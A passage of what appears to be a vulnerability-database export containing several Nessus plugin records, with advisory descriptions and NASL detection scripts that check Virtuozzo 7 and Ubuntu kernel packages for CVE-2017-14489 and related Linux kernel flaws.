script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-14489\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-083)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - ChunYu Wang from Red Hat found a netlink use-after-free\n issue by syzkaller. Access to already freed memory\n (groups in struct netlink_sock) could cause host crash\n or memory corruption.\n\n - An unprivileged user inside a container could cause a\n denial of service (kernel crash in user_read()\n function) using a specially crafted sequence of system\n calls.\n\n - The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n through 4.13.2 allows local users to cause a denial of\n service (panic) by leveraging incorrect length\n validation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2878783\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-18.7-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?108c3980\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-20.18-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3feb80ce\");\n # 
https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.10-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22e57864\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.15-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ac0fd0e\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c85a3bea\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.36.1.vz7.18.7\",\n \"patch\",\"readykernel-patch-18.7-31.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.36.1.vz7.20.18\",\n \"patch\",\"readykernel-patch-20.18-31.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.10\",\n \"patch\",\"readykernel-patch-30.10-31.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.15\",\n \"patch\",\"readykernel-patch-30.15-31.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-31.1-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_WARNING, release:\"Virtuozzo-7\");\n", "cvss": {"score": 
4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:13:15", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - An unprivileged user inside a container could cause a\n denial of service (kernel crash in user_read()\n function) using a specially crafted sequence of system\n calls.\n\n - The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n through 4.13.2 allows local users to cause a denial of\n service (panic) by leveraging incorrect length\n validation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 33, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-09-25T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-082)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489"], "modified": "2017-09-25T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-082.NASL", "href": "https://www.tenable.com/plugins/nessus/103425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103425);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-14489\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-082)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is 
missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - An unprivileged user inside a container could cause a\n denial of service (kernel crash in user_read()\n function) using a specially crafted sequence of system\n calls.\n\n - The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n through 4.13.2 allows local users to cause a denial of\n service (panic) by leveraging incorrect length\n validation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2878782\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-15.2-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a144d02b\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.18.2.vz7.15.2\",\n \"patch\",\"readykernel-patch-15.2-31.1-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_WARNING, release:\"Virtuozzo-7\");\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T06:46:06", "description": "USN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. 
This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface\nin the Linux kernel did not properly validate attributes when handling\ncertain requests. A local attacker with the CAP_NET_ADMIN could use\nthis to cause a denial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux\nkernel in some situations did not properly prevent second level guests\nfrom reading and writing the hardware CR8 register. A local attacker\nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux\nkernel did not properly restrict key reads on negatively instantiated\nkeys. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs\ninterface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\nA local privileged attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux\nkernel did not properly initialize a data structure returned to user\nspace. A local attacker could use this to expose sensitive information\n(kernel memory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). 
(CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the\nLinux kernel did not properly validate data structures. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly initialize data returned to user space in some\nsituations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem\nin the Linux kernel did not properly handle attempts to set reserved\nbits in a task's extended state (xstate) area. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device\ndriver in the Linux kernel contained race conditions when fetching\nfrom the ring-buffer. A local attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-01T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial vulnerabilities (USN-3469-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3469-2.NASL", "href": "https://www.tenable.com/plugins/nessus/104321", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3469-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104321);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12192\", \"CVE-2017-14051\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\", \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\");\n script_xref(name:\"USN\", value:\"3469-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial vulnerabilities (USN-3469-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface\nin the Linux kernel did not properly validate attributes when handling\ncertain requests. A local attacker with the CAP_NET_ADMIN could use\nthis to cause a denial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux\nkernel in some situations did not properly prevent second level guests\nfrom reading and writing the hardware CR8 register. 
A local attacker\nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux\nkernel did not properly restrict key reads on negatively instantiated\nkeys. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs\ninterface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\nA local privileged attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux\nkernel did not properly initialize a data structure returned to user\nspace. A local attacker could use this to expose sensitive information\n(kernel memory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the\nLinux kernel did not properly validate data structures. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly initialize data returned to user space in some\nsituations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem\nin the Linux kernel did not properly handle attempts to set reserved\nbits in a task's extended state (xstate) area. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device\ndriver in the Linux kernel contained race conditions when fetching\nfrom the ring-buffer. 
A local attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3469-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/28\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12192\", \"CVE-2017-14051\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\", \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3469-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-98-generic\", pkgver:\"4.4.0-98.121~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-98-generic-lpae\", pkgver:\"4.4.0-98.121~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-98-lowlatency\", pkgver:\"4.4.0-98.121~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae-lts-xenial\", pkgver:\"4.4.0.98.82\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lts-xenial\", pkgver:\"4.4.0.98.82\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency-lts-xenial\", pkgver:\"4.4.0.98.82\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:46:06", "description": "Anthony 
Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface\nin the Linux kernel did not properly validate attributes when handling\ncertain requests. A local attacker with the CAP_NET_ADMIN could use\nthis to cause a denial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux\nkernel in some situations did not properly prevent second level guests\nfrom reading and writing the hardware CR8 register. A local attacker\nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux\nkernel did not properly restrict key reads on negatively instantiated\nkeys. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs\ninterface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\nA local privileged attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux\nkernel did not properly initialize a data structure returned to user\nspace. A local attacker could use this to expose sensitive information\n(kernel memory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the\nLinux kernel did not properly validate data structures. 
A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly initialize data returned to user space in some\nsituations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem\nin the Linux kernel did not properly handle attempts to set reserved\nbits in a task's extended state (xstate) area. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device\ndriver in the Linux kernel contained race conditions when fetching\nfrom the ring-buffer. A local attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-01T00:00:00", "title": "Ubuntu 16.04 LTS : linux, linux-aws, linux-gke, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3469-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-gke", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke"], "id": "UBUNTU_USN-3469-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104320", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3469-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
